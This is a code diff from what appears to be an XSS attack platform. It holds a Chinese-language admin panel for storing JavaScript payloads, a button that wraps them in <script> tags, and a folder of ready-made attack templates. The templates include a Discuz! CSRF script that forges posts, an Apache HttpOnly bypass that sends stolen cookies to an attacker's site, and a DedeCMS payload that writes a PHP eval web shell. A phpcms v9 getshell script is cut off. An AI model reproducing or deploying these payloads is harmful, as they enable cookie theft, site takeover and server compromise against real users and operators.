$("#jsTemplate_add_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_del_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_clear_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_add_button").click(function(event) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
});
$("#jsTemplate_del_button").click(function(event) {
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
if (confirm("您确认执行删除操作么?")) {
var datarecord = jsTemplate_dataAdapter.records[index];
$.ajax({
url: urlbase + "?js_template_cmd=del&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
reload_jsTemplate_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {    
if (status == 'timeout')    {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php"; 
} 
}
});
}
}
});
$("#jsTemplate_clear_button").click(function(event) {
if (confirm("您确认清空所有JS模板么")) {
$.ajax({
url: urlbase + "?js_template_cmd=clear",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
reload_jsTemplate_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
//////////////////////
//编辑面板表单初始化//
//////////////////////
$("#jsTemplate_form").change(function() {
$('#jsTemplate_form').data('changed', true);
});
//////////////////////////
//编辑面板输入控件初始化//
//////////////////////////
$("#jsTemplate_name").jqxInput({
width: '80%',
height: '20px',
placeHolder: '请输入js模板名...'
});
$('#jsTemplate_description').jqxTextArea({
width: '100%',
height: 50,
placeHolder: '请输入js模板描述...'
});
////////////////
//编辑器初始化//
////////////////
$('#jsTemplate_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
var jsTemplate_editor = ace.edit("jsTemplate_content");
jsTemplate_editor.setTheme("ace/theme/chrome");
jsTemplate_editor.session.setMode("ace/mode/javascript");
jsTemplate_editor.session.setUseWrapMode(true);
jsTemplate_editor.renderer.setScrollMargin(10, 10);
jsTemplate_editor.setOptions({
// "scrollPastEnd": 0.8,
autoScrollEditorIntoView: true
});
jsTemplate_editor.on("change", function() {
$('#jsTemplate_form').data('changed', true);
});
jsTemplate_editor.$blockScrolling = Infinity;
jsTemplate_editor.setFontSize(16);
//////////////////////
//编辑器工具栏初始化//
//////////////////////
$("#jsTemplate_content_toolBar").jqxToolBar({
width: "100%",
height: 35,
minimizeWidth: 100,
tools: 'button | button | button',
initTools: function(type, index, tool, menuToolIninitialization) {
if (type == "button") {
tool.attr("type", "button");
}
switch (index) {
case 0:
tool.val("格式化");
tool.click(function() {
var source = jsTemplate_editor.getValue();
if (source !== "") {
var output = js_beautify(source);
jsTemplate_editor.setValue(output, -1);
}
});
break;
case 1:
tool.val("压缩");
tool.click(function() {
var source = jsTemplate_editor.getValue();
if (source !== "") {
var output = jsmin(source, 3);
jsTemplate_editor.setValue(output.trim(), -1);
}
});
break;
case 2:
tool.val("复制js地址");
var client = new ZeroClipboard(tool);
client.on("copy", function(event) {
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var clipboard = event.clipboardData;
var datarecord = jsTemplate_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
clipboard.setData("text/plain", url);
//alert("JS地址已复制至剪切板\n" + url);
} else {
alert("请先保存!");
}
});
break;
}
}
});
//////////////////////////
//编辑表单提交按键初始化//
//////////////////////////
$("#jsTemplate_ok").jqxButton({
width: 65,
height: 25
});
$("#jsTemplate_cancel").jqxButton({
width: 65,
height: 25
});
$("#jsTemplate_ok").click(function(event) {
var name = $('#jsTemplate_name').val();
var desc = $('#jsTemplate_description').val();
var content = jsTemplate_editor.getValue();
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
//当前状态为新增一个js
if (index === -1) {
var data = {
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?js_template_cmd=add",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
jsTemplate_last_select_name = name;
reload_jsTemplate_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//当前状态为修改一个js
else {
var datarecord = jsTemplate_dataAdapter.records[index];
var data = {
'old_name': datarecord.js_name,
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?js_template_cmd=modify",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
jsTemplate_last_select_name = name;
reload_jsTemplate_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
$("#jsTemplate_cancel").click(function(event) {
$('#jsTemplate_form').data('changed', false);
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
jsTemplate_update_form(index);
});
//////////////
//大小自适应//
//////////////
$(window).resize(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
$("#jsTemplate_splitter").jqxSplitter({
height: base_height > 0 ? base_height : 0
});
$('#jsTemplate_listbox').jqxListBox({
height: base_height - 29 > 0 ? base_height - 29 : 0
});
$('#jsTemplate_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
});
});

558
static/js/loadmyjs.js Normal file
View File

@@ -0,0 +1,558 @@
$(document).ready(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
////////////////
//分割栏初始化//
////////////////
$("#myJS_splitter").jqxSplitter({
width: '100%',
height: base_height > 0 ? base_height : 0,
panels: [{
size: '400px'
}]
});
////////////////
//js列表初始化//
////////////////
var myJS_last_select_index = -1;
var myJS_is_select_rollback = false;
var myJS_last_select_name = "";
//数据源与datafields
var myJS_source = {
datatype: "json",
datafields: [{
name: "js_uri"
}, {
name: "js_name"
}, {
name: "js_description"
}, {
name: "js_name_abbr"
}, {
name: "js_description_abbr"
}, ],
id: "js_name",
url: urlbase + "?my_js_cmd=list",
};
var myJS_dataAdapter = new $.jqx.dataAdapter(myJS_source, {
loadComplete: function() {
if (myJS_last_select_name !== "") {
$("#myJS_listbox").jqxListBox('selectItem', myJS_last_select_name);
myJS_last_select_name = "";
}
}
});
$('#myJS_listbox').jqxListBox({
selectedIndex: -1,
source: myJS_dataAdapter,
displayMember: "js_name",
valueMember: "js_name",
itemHeight: 60,
width: '100%',
height: base_height - 29 > 0 ? base_height - 29 : 0,
renderer: function(index, label, value) {
//注js_name_abbr与js_description_abbr经过了stripStr
var datarecord = myJS_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
$('#myJS_listbox').on('select', function(event) {
myJS_update_form(event.args.index);
});
//////////////////
//js列表相关函数//
//////////////////
//清空编辑表单
function myJS_clear_form() {
$('#myJS_name').val("");
$('#myJS_description').val("");
myJS_editor.setValue("", -1);
$('#myJS_form').data('changed', false);
}
//根据列表选中的index加载编辑表单
function myJS_update_form(current_select_index) {
if (myJS_is_select_rollback) {
myJS_is_select_rollback = false;
return;
}
if ($('#myJS_form').data('changed')) {
if (confirm("------------------------------------\n提示未保存的内容将会丢失\n------------------------------------\n\n确认离开吗")) {
$('#myJS_form').data('changed', false);
myJS_last_select_index = current_select_index;
} else {
myJS_is_select_rollback = true;
$('#myJS_listbox').jqxListBox('selectIndex', myJS_last_select_index);
return;
}
} else {
myJS_last_select_index = current_select_index;
}
//index为-1代表list没有选中项现在是新增一个js
if (current_select_index === -1) {
$('#myJS_ok').text('新增');
myJS_clear_form();
}
//index为大于0代表现在是修改一个js
else {
$('#myJS_ok').text('修改');
var datarecord = myJS_dataAdapter.records[current_select_index];
$('#myJS_name').val(datarecord.js_name);
$('#myJS_description').val(datarecord.js_description);
myJS_update_content(datarecord.js_name);
}
}
//根据列表选中的index将对应js的内容加载到编辑器中
function myJS_update_content(filename) {
$('#myJS_form').data('changed', false);
myJS_editor.setReadOnly(true);
$.ajax({
url: urlbase + "?my_js_cmd=get&name=" + filename,
dataType: "json",
timeout: interval,
success: function(data) {
myJS_editor.setValue(data, -1);
$('#myJS_form').data('changed', false);
myJS_editor.setReadOnly(false);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//重新载入js列表
function reload_myJS_listbox() {
$('#myJS_form').data('changed', false);
myJS_dataAdapter.dataBind();
}
//////////////////////
//js列表工具栏初始化//
//////////////////////
$("#myJS_add_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_del_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_clear_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_add_button").click(function(event) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
});
$("#myJS_del_button").click(function(event) {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
if (confirm("您确认执行删除操作么?")) {
var datarecord = myJS_dataAdapter.records[index];
$.ajax({
url: urlbase + "?my_js_cmd=del&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
reload_myJS_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
}
});
$("#myJS_clear_button").click(function(event) {
if (confirm("您确认清空所有JS模板么")) {
$.ajax({
url: urlbase + "?my_js_cmd=clear",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
reload_myJS_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
//////////////////////
//编辑面板表单初始化//
//////////////////////
$("#myJS_form").change(function() {
$('#myJS_form').data('changed', true);
});
//////////////////////////
//编辑面板输入控件初始化//
//////////////////////////
$("#myJS_name").jqxInput({
width: '80%',
height: '20px',
placeHolder: '请输入js模板名...'
});
$('#myJS_description').jqxTextArea({
width: '100%',
height: 50,
placeHolder: '请输入js模板描述...'
});
////////////////
//编辑器初始化//
////////////////
$('#myJS_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
var myJS_editor = ace.edit("myJS_content");
myJS_editor.setTheme("ace/theme/chrome");
myJS_editor.session.setMode("ace/mode/javascript");
myJS_editor.session.setUseWrapMode(true);
myJS_editor.renderer.setScrollMargin(10, 10);
myJS_editor.setOptions({
// "scrollPastEnd": 0.8,
autoScrollEditorIntoView: true
});
myJS_editor.on("change", function() {
$('#myJS_form').data('changed', true);
});
myJS_editor.$blockScrolling = Infinity;
myJS_editor.setFontSize(16);
//////////////////////
//编辑器工具栏初始化//
//////////////////////
$("#myJS_content_toolBar").jqxToolBar({
width: "100%",
height: 35,
minimizeWidth: 100,
tools: 'button | button | combobox button | button | button',
initTools: function(type, index, tool, menuToolIninitialization) {
if (type == "button") {
tool.attr("type", "button");
}
switch (index) {
case 0:
tool.val("格式化");
tool.click(function() {
var source = myJS_editor.getValue();
if (source !== "") {
var output = js_beautify(source);
myJS_editor.setValue(output, -1);
}
});
break;
case 1:
tool.val("压缩");
tool.click(function() {
var source = myJS_editor.getValue();
if (source !== "") {
var output = jsmin(source, 3);
myJS_editor.setValue(output.trim(), -1);
}
});
break;
case 2:
tool.attr("id", "insert_jsTemplate_button");
break;
case 3:
tool.val("插入模板");
tool.click(function() {
var index = $("#insert_jsTemplate_button").jqxComboBox('getSelectedIndex');
if (index >= 0) {
var datarecord = jsTemplate_dataAdapter.records[index];
$.ajax({
url: urlbase + "?js_template_cmd=get&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(data) {
myJS_editor.insert(data);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
break;
case 4:
tool.val("生成payload");
tool.click(function() {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var datarecord = myJS_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
$("#Ww_B_0_textarea").val('<script src="' + url + '"></script>');
$('#xssorWindow').jqxWindow('open');
$('#xssorWindow').addClass('animated');
} else {
alert("请先保存!");
}
});
break;
case 5:
tool.val("复制js地址");
var client = new ZeroClipboard(tool);
client.on("copy", function(event) {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var clipboard = event.clipboardData;
var datarecord = myJS_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
clipboard.setData("text/plain", url);
//alert("JS地址已复制至剪切板\n" + url);
} else {
alert("请先保存!");
}
});
break;
}
}
});
$("#insert_jsTemplate_button").jqxComboBox({
source: jsTemplate_dataAdapter,
selectedIndex: 0,
displayMember: "js_name",
valueMember: "js_name",
width: 200,
autoDropDownHeight: false,
placeHolder: "选择js模板",
renderer: function(index, label, value) {
var datarecord = jsTemplate_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
//////////////////////////
//编辑表单提交按键初始化//
//////////////////////////
$("#myJS_ok").jqxButton({
width: 65,
height: 25
});
$("#myJS_cancel").jqxButton({
width: 65,
height: 25
});
$("#myJS_ok").click(function(event) {
var name = $('#myJS_name').val();
var desc = $('#myJS_description').val();
var content = myJS_editor.getValue();
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
//当前状态为新增一个js
if (index === -1) {
var data = {
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?my_js_cmd=add",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
myJS_last_select_name = name;
reload_myJS_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//当前状态为修改一个js
else {
var datarecord = myJS_dataAdapter.records[index];
var data = {
'old_name': datarecord.js_name,
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?my_js_cmd=modify",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
myJS_last_select_name = name;
reload_myJS_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
$("#myJS_cancel").click(function(event) {
$('#myJS_form').data('changed', false);
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
myJS_update_form(index);
});
/////////
//xssor//
/////////
$('#xssorWindow').jqxWindow({
height: 290,
width: 610,
resizable: false,
isModal: true,
modalOpacity: 0.3,
autoOpen: false,
title: "XSS'OR js编码工具",
});
$("#Ww_B_0_textarea").jqxTextArea({
height: 220,
width: 270,
});
$("#rwb_b2").jqxButton();
$("#rwb_b2_j").jqxButton();
$("#rwb_b1").jqxButton();
$("#rwb_b1_j").jqxButton();
$("#rwb_b3").jqxButton();
$("#rwb_b3j").jqxButton();
$("#rwb_b4").jqxButton();
$("#rwb_b4j").jqxButton();
$("#rwb_b5").jqxButton();
$("#rwb_b5j").jqxButton();
$("#rwb_b6").jqxButton();
$("#rwb_b6j").jqxButton();
$("#rwb_b7").jqxButton();
$("#rwb_b7j").jqxButton();
$("#rwb_b8").jqxButton();
//////////////
//大小自适应//
//////////////
$(window).resize(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
$("#myJS_splitter").jqxSplitter({
height: base_height > 0 ? base_height : 0
});
$('#myJS_listbox').jqxListBox({
height: base_height - 29 > 0 ? base_height - 29 : 0
});
$('#myJS_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
});
});

852
static/js/loadgrid.js → static/js/loadxsspanel.js
View File

File diff suppressed because it is too large Load Diff

8
static/js/login.js
View File

@@ -1,8 +1,8 @@
$(document).ready(function() {
$("#submit").removeAttr("disabled");
$("#submit").click(function(event) {
if($("#password").val()=="")
return true;
if($("#password").val()==="")
return false;
var salt="!KTMdg#^^I6Z!deIVR#SgpAI6qTN7oVl";
$("#password").val(md5(salt + $("#password").val() + salt));
$("#password").val(md5(salt + $("#password").val() + salt));
@@ -10,6 +10,7 @@ $(document).ready(function() {
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
return true;
});
$("#note").click(function(event) {
alert("神仙难救");
@@ -120,7 +121,6 @@ function ii(a, b, c, d, x, s, t) {
}
function md51(s) {
txt = "";
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878],
i;

1
static/js/mode-javascript.js Normal file
View File

File diff suppressed because one or more lines are too long

6
static/js/notification.js
View File

@@ -7,9 +7,11 @@ function readNotification(){
if(document.title)
document.title=oldTitle;
$(this).parent().fadeOut(200);
//reload data
$("#xss_panel_tab").tab('show');
//重新载入数据
$('#panelGrid').jqxGrid('updatebounddata');
}
function showNotification(newUnreadNum,lastedID,interval){

1
static/js/theme-chrome.js Normal file
View File

@@ -0,0 +1 @@
define("ace/theme/chrome",["require","exports","module","ace/lib/dom"],function(e,t,n){t.isDark=!1,t.cssClass="ace-chrome",t.cssText='.ace-chrome .ace_gutter {background: #ebebeb;color: #333;overflow : hidden;}.ace-chrome .ace_print-margin {width: 1px;background: #e8e8e8;}.ace-chrome {background-color: #FFFFFF;color: black;}.ace-chrome .ace_cursor {color: black;}.ace-chrome .ace_invisible {color: rgb(191, 191, 191);}.ace-chrome .ace_constant.ace_buildin {color: rgb(88, 72, 246);}.ace-chrome .ace_constant.ace_language {color: rgb(88, 92, 246);}.ace-chrome .ace_constant.ace_library {color: rgb(6, 150, 14);}.ace-chrome .ace_invalid {background-color: rgb(153, 0, 0);color: white;}.ace-chrome .ace_fold {}.ace-chrome .ace_support.ace_function {color: rgb(60, 76, 114);}.ace-chrome .ace_support.ace_constant {color: rgb(6, 150, 14);}.ace-chrome .ace_support.ace_type,.ace-chrome .ace_support.ace_class.ace-chrome .ace_support.ace_other {color: rgb(109, 121, 222);}.ace-chrome .ace_variable.ace_parameter {font-style:italic;color:#FD971F;}.ace-chrome .ace_keyword.ace_operator {color: rgb(104, 118, 135);}.ace-chrome .ace_comment {color: #236e24;}.ace-chrome .ace_comment.ace_doc {color: #236e24;}.ace-chrome .ace_comment.ace_doc.ace_tag {color: #236e24;}.ace-chrome .ace_constant.ace_numeric {color: rgb(0, 0, 205);}.ace-chrome .ace_variable {color: rgb(49, 132, 149);}.ace-chrome .ace_xml-pe {color: rgb(104, 104, 91);}.ace-chrome .ace_entity.ace_name.ace_function {color: #0000A2;}.ace-chrome .ace_heading {color: rgb(12, 7, 255);}.ace-chrome .ace_list {color:rgb(185, 6, 144);}.ace-chrome .ace_marker-layer .ace_selection {background: rgb(181, 213, 255);}.ace-chrome .ace_marker-layer .ace_step {background: rgb(252, 255, 0);}.ace-chrome .ace_marker-layer .ace_stack {background: rgb(164, 229, 101);}.ace-chrome .ace_marker-layer .ace_bracket {margin: -1px 0 0 -1px;border: 1px solid rgb(192, 192, 192);}.ace-chrome .ace_marker-layer .ace_active-line {background: rgba(0, 0, 0, 0.07);}.ace-chrome .ace_gutter-active-line {background-color : #dcdcdc;}.ace-chrome .ace_marker-layer .ace_selected-word {background: rgb(250, 250, 255);border: 1px solid rgb(200, 200, 250);}.ace-chrome .ace_storage,.ace-chrome .ace_keyword,.ace-chrome .ace_meta.ace_tag {color: rgb(147, 15, 128);}.ace-chrome .ace_string.ace_regex {color: rgb(255, 0, 0)}.ace-chrome .ace_string {color: #1A1AA6;}.ace-chrome .ace_entity.ace_other.ace_attribute-name {color: #994409;}.ace-chrome .ace_indent-guide {background: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAACCAYAAACZgbYnAAAAE0lEQVQImWP4////f4bLly//BwAmVgd1/w11/gAAAABJRU5ErkJggg==") right repeat-y;}';var r=e("../lib/dom");r.importCssString(t.cssText,t.cssClass)})

1
static/js/worker-javascript.js Normal file
View File

File diff suppressed because one or more lines are too long

5
template/.htaccess Normal file
View File

@@ -0,0 +1,5 @@
<Files ~ "\.js$">
Order allow,deny
Allow from all
</Files>
deny from all

1
template/Discuz! CSRF.desc Normal file
View File

@@ -0,0 +1 @@
EMNCwPkx9TYn5ZDlqfBEslnYYeGJHLcLb/qv5OaG+4o5SVqZ6hSCM5Eirk6LU9gmU0Qek8YzlINj/+DMO1Xm3SoQnptHAC94I0KuA4f0ztsevD2nlMGjrB8R9PxW4oZzty8EZq1e0g0NM2NWEXf4gQ==

78
template/Discuz! CSRF.js Normal file
View File

@@ -0,0 +1,78 @@
function getHash() {
for (var i = 0; i < document.links.length; i++) {
if (document.links[i].href.indexOf("action=logout&formhash=") > 0) {
hash = document.links[i].href;
hash = hash.substr(hash.length - 8, hash.length);
break;
}
}
}
x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
callback(ajax.responseText)
}
}
}
},
display: function(o) {
if (typeof(o) == 'object') {
var str = '';
for (a in o) {
str += a + '=' + o[a] + '&';
}
str = str.substr(0, str.length - 1);
return str;
} else {
return o;
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content = x.display(content);
ajax.send(content);
x.handle(ajax, callback)
},
}
var hash = "";
getHash();
/*发帖操作
x.post("接口地址","formhash="+hash+"&posttime=137756647&wysiwyg=1&subject=%E6%96%B0%E4%BA%BA%E6%8A%A5%E9%81%93TEST&message=%E6%96%B0%E4%BA%BA%E6%8A%A5%E9%81%93TEST+hacked++by+helen&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");
*/
/*置顶帖子 <script src="http://w/try/1.js"> </script>
x.post("接口地址","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style[1]=0&highlight_style[2]=0&highlight_style[3]=0&expirationhighlight=&reason=");
*/

1
template/apache_httponly_bypass.desc Normal file
View File

@@ -0,0 +1 @@
sSKYRBjjtWZmxavSz6MBJYsw9klXnW3MqDZHZjN+MjeFl9XSrwTAXL1R02fnP9WplAAkFxeMJoxpym44zsx9R+LheQ2l1CAiOlfuCYL+SRH5d9RwAT0KpxkU/vZY

36
template/apache_httponly_bypass.js Normal file
View File

@@ -0,0 +1,36 @@
var website="http://网站地址";
function setCookies() {
/*apache server limit 8192*/
var str = "";
for (var i = 0; i < 819; i++) {
str += "x";
}
for (i = 0; i < 10; i++) {
var cookie = "ray" + i + "=" + str + ";path=/";
document.cookie = cookie;
}
}
function parseCookies() {
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
content = content[1].replace("Cookie: ", "");
cookies = content.replace(/ray\d=x+;?/g, '')
try {
var myopener = '';
myopener = window.parent.openner.location;
var myparent = '';
myparent = window.parent.location;
} catch (err) {
myopener = '0';
myparent = '0';
}
window.location = website + '/index.php?location=' + escape(document.location) + '&toplocation=' + escape(myparent) + '&cookie=' + escape(cookies) + '&opener=' + escape(myopener);
}
}
setCookies();
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("POST", "/?" + Math.random(), true);
xhr.send(null);

1
template/dedecms一句话.desc Normal file
View File

@@ -0,0 +1 @@
EO915s8Gh/G7MCsJfjX9/xXqA4+EXOgQBb6WrrW2njqanQK/sqYG4dgxwhGeG4AFNgICOMcHoI1/9bpc948zTp+MQ2jH/uew/Y9k4WJiES6BAfEybDJpbMmdJjfYDWTwJtSFmlwdGub5tq3Qn5USCsfnPVNtEcI5NFhawNDvphvsvn60qBNNmbXmcmgw/la3cDD3MOg=

32
template/dedecms一句话.js Normal file
View File

@@ -0,0 +1,32 @@
varrequest = false;
if (window.XMLHttpRequest) {
request = newXMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
else if(window.ActiveXObject) {
varversions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for (vari = 0; i < versions.length; i++) {
try {
request = newActiveXObject(versions);
} catch (e) {}
}
}
xmlhttp = request;
function getFolder(url) {
obj = url.split('/');
return obj[obj.length - 2];
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin() {
varurl = "/" + u + "/sys_sql_query.php";
varparams = "fmdo=edit&backurl=&activepath=%2Fdata&filename=123.php&str=<%3Fphp+eval%28%24_POST%5Br123%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", varparams.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(varparams);
}

1
template/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

1
template/phpcms v9 通过模板getshell.desc Normal file
View File

@@ -0,0 +1 @@
sSyoRzTLMZmiTmwqAGzoI5gm8EdPkHxHNNbLpNztso7XxohHcvZa

61
template/phpcms v9 通过模板getshell.js Normal file
View File

@@ -0,0 +1,61 @@
if (top.window.location.href.indexOf("pc_hash=") > 0) {
var hash = top.window.location.href.substr(top.window.location.href.indexOf("pc_hash=") + 8, 6);
}
var pkav = {
ajax: function() {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
return xmlHttp;
},
req: function(url, data, method, callback) {
method = (method || "").toUpperCase();
method = method || "GET";
data = data || "";
if (url) {
var a = this.ajax();
a.open(method, url, true);
if (method == "POST") {
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
}
a.onreadystatechange = function() {
if (a.readyState == 4 && a.status == 200) {
if (callback) {
callback(a.responseText);
}
}
};
if ((typeof data) == "object") {
var arr = [];
for (var i in data) {
arr.push(i + "=" + encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
} else {
a.send(data || null);
}
}
},
get: function(url, callback) {
this.req(url, "", "GET", callback);
},
post: function(url, data, callback) {
this.req(url, data, "POST", callback);
}
};
if (!window.__x) {
